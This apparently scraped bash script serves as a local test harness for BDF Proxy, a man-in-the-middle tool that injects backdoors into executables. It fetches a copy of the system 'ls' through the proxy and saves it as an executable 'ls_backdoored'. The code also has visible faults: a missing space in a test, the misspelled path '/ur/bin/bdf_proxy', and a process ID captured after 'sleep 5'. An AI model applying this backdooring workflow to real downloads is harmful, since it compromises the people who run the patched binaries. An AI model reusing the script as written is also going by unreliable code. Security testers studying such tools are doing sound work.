1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51
|
#!/usr/bin/env bash
# This script configures a simple local python webserver
# and downloads $(which ls) from it through BDF proxy.
# figure out python executable (especially relevant on arch linux)
if [ $(which python2.7) ]
then
PYTHON=python2.7
elif [$(which python2) ]
then
PYTHON=python2
else
PYTHON=python
fi
# start up the server
echo "[*] Starting up a webserver to serve /tmp"
cd /tmp
$PYTHON -m SimpleHTTPServer 9001 &
SERVER_PID=$!
cd -
echo "[*] Making a backup copy of config"
cp /etc/bdfproxy/bdfproxy.cfg bdfproxy.cfg
echo "[*] Patching config to turn off transparentProxy"
sed -i 's/^transparentProxy.\+/transparentProxy = False/' bdfproxy.cfg
# start the proxy
echo "[*] Starting"
$PYTHON /ur/bin/bdf_proxy &
sleep 5
PROXY_PID=$!
echo "[*] Copying "$(which ls)" to /tmp"
cp $(which ls) /tmp
echo "[*] Attempting to download a backdoored version of "$(which ls)" to $(pwd)/ls_backdoored"
curl 'http://localhost:9001/ls' --proxy1.0 localhost:8080 > ls_backdoored
echo "[*] Shutting down"
kill $SERVER_PID
kill $PROXY_PID
echo "[*] Cleaning up temporary files"
rm -f /tmp/ls
rm bdfproxy.cfg
echo "[*] ls_backdoored is available for testing in" $(pwd)
chmod +x ls_backdoored
|